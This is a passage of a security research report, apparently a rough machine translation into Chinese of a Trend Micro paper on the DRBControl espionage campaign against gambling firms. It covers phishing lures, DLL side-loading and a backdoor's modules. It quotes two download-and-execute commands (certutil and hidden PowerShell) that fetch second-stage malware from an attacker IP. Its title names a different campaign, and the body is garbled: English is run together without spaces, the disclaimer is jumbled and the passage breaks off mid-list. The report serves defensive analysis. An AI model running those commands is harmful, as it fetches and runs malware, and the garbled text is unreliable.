EastWind 运动 ： 对俄罗斯政府组织的新 CloudSorcerer 攻击

发现DRBControl 在网络间谍活动中定位赌博操作 丹尼尔·伦希、塞德里克·佩内特、肯尼·卢和贾姆兹·亚内扎 趋势微观法律免责声明 此处提供的信息用于一般信息和教育目的。它不是有意和 不应被解释为构成法律建议。The此处包含的信息可能不适用于所有情况，可能不会反映当前的情况。 此处包含的任何内容都不应依赖或采取行动在没有基于fit的法律建议的基础上 提出了特定的事实和情况，什么也没有此处应另作解释。趋势科技 保留修改本文档内容的权利 在任何时候，恕不另行通知。 将任何材料翻译成其他语言仅为了方便起见。翻译准确性 不保证也不暗示。如果出现任何问题与翻译的准确性有关，请参阅 文档的ficial版本的原始语言。任何翻译中产生的差异或差异是 没有约束力，对合规性或执行目的。 尽管趋势科技使用合理的努力来包括准确和最新的信息,趋势科技 不作任何保证或陈述 其准确性、货币或完整性。您同意访问、使用和依赖本文件 其内容的风险由您自行承担。趋势科技放弃任何明示或暗示的保证。 趋势科技或参与创建、 制作或交付本文件应承担责任 任何后果、损失或损害，包括直接、 间接的、特殊的、后果性的、失去商业利益的fi，或特殊损害赔偿， 使用，或无法使用，或与使用有关本文档或内容中的任何错误或遗漏 Thereof.Useofthisinformationconstitutesacceptancefor 在“原样”条件下使用。 Contents 4 最初的妥协： Spear网络钓鱼 7 恶意软件分析 18 其他使用的恶意软件家族 21 开发后工具 22 基础架构分析 24 与已知威胁参与者的链接 由发布 趋势科技研究26 Writtenby 丹尼尔·伦希塞德里克·佩内特, KenneyLu和JamzYaneza 根据许可使用的库存图像 Shutterstock.com Conclusion 2019年夏天，Talent-JumpTechnologies，Inc.联系了趋势科技关于他们在执行事件响应后发现的后门 位于菲律宾的公司的操作。趋势科技提供了进一步关于这个特殊后门的情报和背景。深入分析 透露后门正被高级持续威胁使用 我们称之为“DRBControl”的(APT)演员，因为我们找不到任何相关的东西到我们的数据库或公共恶意软件存储库中的组。 我们的分析还发现，威胁行为者使用了一些额外的后门和后期开发工具，以及一些鱼叉式网络钓鱼可能在相关的初始阶段使用的文档 竞选。其中一个后门是特别感兴趣的，因为它使用了fiLE托管服务Dropbox作为命令和控制(C&C)通道。我们共享我们对Dropbox的分析，自那以后一直与趋势科技合作 关于问题。 我们观察到这场运动背后的威胁演员有非常特殊的fic目标，因为它只在东南部的赌博和博彩公司之后亚洲。我们已经意识到欧洲和中东地区 也是有针对性的，但我们不能在 Writing.Theexfiltrateddatawasmostlycomposedofdatabasesandsource 代码，这让我们相信这场运动是用于网络间谍 或者获得竞争情报。一些后门对我们来说是未知的， 这可能表明它是一个以前未报告的群体。然而，我们也设法将其与一些已知的威胁参与者联系起来。 这篇研究论文详细介绍了这一运动的不同阶段，包括 最初的鱼叉式网络钓鱼电子邮件，对后门的详细分析，以及多种后开发工具。它还涵盖了对威胁的观察 演员的活动和基础设施，包括与已知APT的连接 groups. 出发地:2931436431@[BLOCKED]q[.]com 收件人：支持-<编辑>@<编辑> 主题根据目标支持团队使用的语言而更改。支持- cn例如，团队收到了一封带有中文主题的电子邮件“注册不了的截图""(无法注册 截图“)，而support-jp团队收到了一封类似的电子邮件，以“错误屏幕截图”为主题。 此外,文档被不同地显示。 图1.发送给日本支持团队的Spear-phishing文档 4|发现DRBControl：在针对赌博操作的网络间谍活动中 最初的妥协： Spear网络钓鱼 在有针对性的攻击中，鱼叉式网络钓鱼是一种常见的感染媒介1由威胁行为者2寻找在目标的基础设施中获得初步立足点。获得目标的电子邮件地址相对容易， 使用通用电子邮件地址或特定fic个人的电子邮件地址。我们在此公开的活动研究也不例外：威胁行为者使用鱼叉式网络钓鱼来欺骗接收者打开 .DOCX文档。 我们目睹的鱼叉式网络钓鱼活动在2019年5月很活跃。我们可以找到两个不同的(在条款 oflanguage)-butverysimilar-kinesofphishingcontent.Thesocialengineeringusedinthiscampaign 在实现威胁行为者的目标方面，这似乎是相当直截了当和有效的。威胁演员的鱼叉式网络钓鱼攻击以组织的支持团队为目标。 图2.发送给中国支持团队的Spear-phishing文档 支持团队习惯于接收来自客户的请求，以及包含屏幕截图的电子邮件 fromusersmayalsobecommonplacefortheseteams.However,supportteamsshouldbewardofhow 不寻常的是，用户可能会发送包含屏幕截图的.DOCXfile，这需要额外的用户操作（双击，在这种情况下）仅显示图像。 Wewereabletofindatleastthreedifferentversionsoftheinfectingdocuments.Thefirstversion,when 用户双击，嵌入一个可执行文件file，该文件已启动并充当 恶意软件（被趋势科技检测为Trojan.Win32.CLAMBLING.A）。 该文档的第二个版本嵌入了一个.BATfile，它也充当相同版本的下载器恶意软件。 cd%temp%&&certutil-urlcache-split-fhttp://[BLOCKED].[BLOCKED].18.154/debug.exe&debug.exe 在感染文档中找到的命令行内容，下载并执行第二阶段恶意软件 该文档的第三个版本使用PowerShell下载恶意软件。 cmd/cstartpowershell.exe-epBypass-NoP-NonI-WHidden(new-objectSystem.Net.WebClient).DownloadFile('http://[BLOCKED].[BLOCKED].18.154/test.cab','%TEMP%\\test。cab');展开'%temp%\\test.cab'%temp%-f:*;开始处理'%TEMP%\\config.exe' 使用PowerShell下载并执行第二阶段恶意软件 我们的分析表明，前两个版本执行相同的file(检测为Trojan.Win32。 CLAMBLING.A)在受感染的系统上。我们无法从第三个版本中检索test.cabfile，但是我们怀疑有类似的fiNAL有效载荷。 5|发现DRBControl：在针对赌博操作的网络间谍活动中 图3.欺骗用户双击图片并运行恶意代码的恶意文档 （顶部：“注册信息错误图片” 底部:“双击放大图片”) 我们还发现了2017年7月的武器化文档，使用类似的PowerShell代码来删除后门（在本研究中稍后分析为2型），但我们无法在遥测中搜索它。同样，它也欺骗用户双击图像，从而触发代码执行。 6|发现DRBControl：在针对赌博操作的网络间谍活动中 恶意软件分析 此活动使用了我们以前不知道的两个主要后门。我们还发现了一些 已知的恶意软件家族，如PlugX和HyperBro，以及许多自定义的后期开发工具。下面我们描述两个后门的加载、持久性和功能。 1型后门 加载有效载荷 这个后门是用C++语言编写的，类继承自虚拟类。后门也是模块化的，允许使用插件进行扩展。 当前方法：DLL侧面加载 要加载此后门，威胁行为者会启动合法的fiLEMsMpEng.exe,由 Microsoft并描述为“反恶意软件服务可执行文件”。此可执行文件容易受到DLL的攻击侧面装载,3其中在程序上加载了非预期的DLL。在这种情况下，恶意行为者 通过存储名为的file来利用它mpsvc.dll在同一目录中。然后该DLL打开 第三个filename，mpsvc.mui，其中包含混淆的后门，对其进行解码，并将其加载到 svchost.exe过程。 我们在野外发现了两个RAR存档文件（检测为Trojan.Win64.CLAMBLING.A），其中包含上述files。嵌入式files的modifi阳离子时间为2019-07-25。 旧方法：修补合法文件 有趣的是，我们观察到在这个后门的旧版本中使用了一种不同的技术。威胁 actor手动修补了中国存档软件“HaoZip”的合法安装程序的一些字节， （通常在中国用作WinRAR和WinZip的替代方法）将代码ow重定向到函数附加在二进制文件的末尾。 7|发现DRBControl：针对赌博操作的网络间谍活动内部 图4.合法的HaoZip安装程序代码 图5.重定向执行的补丁代码 添加的函数通过将它们与哈希进行比较来解析指向多个WinAPI函数的一些指针 通过简单的自定义算法生成。然后，代码将二进制覆盖加载到内存中，该二进制覆盖 containsaroutinetodecompressandloadthefinalpayload.Theroutinealsocheckiftheprocessis 通过将PEB的第三位与0进行比较来调试。 8|发现DRBControl：针对赌博操作的网络间谍活动内部 图6.通过PEB的调试器检查 后门功能 ThedroppayloadisabackdoorwritteninC++.ItembedsaconsefigamefileincleartextthatcontainsC&C、要复制file的路径以及要创建的服务名称。 如果未提供任何参数，则将file复制到fi配置中指定的fi路径，其属性为设置为系统和隐藏，并向“运行”注册表项添加一个值，以在下一个boot. 图7.AutoRun添加 它处理以下参数： •P：创建一个挂起的svchost.exe进程，注入代码，然后恢复 •O：初始化插件和后门功能 •U：使用passuac.dllfile绕过用户帐户控制(UAC) 运行时类型信息(RTTI)存在于可执行文件中，使我们能够获得真正的类名称: •CHPPlugin：每个“插件”类实现的虚拟类 •CHPCmd：通过终端执行类处理命令 •CHPExplorer：提供浏览目录、枚举网络共享、读取、写入、并执行files •CHPAvi:ClassprovidingrecordingofthescreencontentinAVIformatandAVIfilesenumeration •CHPKeyLog：提供键盘记录功能的类（稍后讨论） •CHPPipe：提供处理命名管道的函数的类 9|发现DRBControl：在针对赌博操作的网络间谍活动中 图8.替换算法 10|发现DRBControl：针对赌博操作的网络间谍活动内部 •CHPProcess：提供枚举和终止进程的函数的类 •CHPProxy:类添加代理支持 •CHPRegedit：提供处理注册表项的函数（枚举，复制，设置，删除）的类 •CHPScreen：类处理屏幕截图捕获功能 •CHPService：类提供处理服务的函数（创建、删除、修改、查询、启动） •CHPNet：每个“通信协议”类实现的虚拟类 •CHPHttp：与HTTP协议处理相关的网络类 •CHPTcp：与TCP协议处理相关的网络类 •CHPUdp：与UDP协议处理相关的网络类 •CHPTelnet：与Telnet协议处理相关的网络类 恶意软件还会将受感染系统的信息（如下所示）发送到C&C服务器： •主机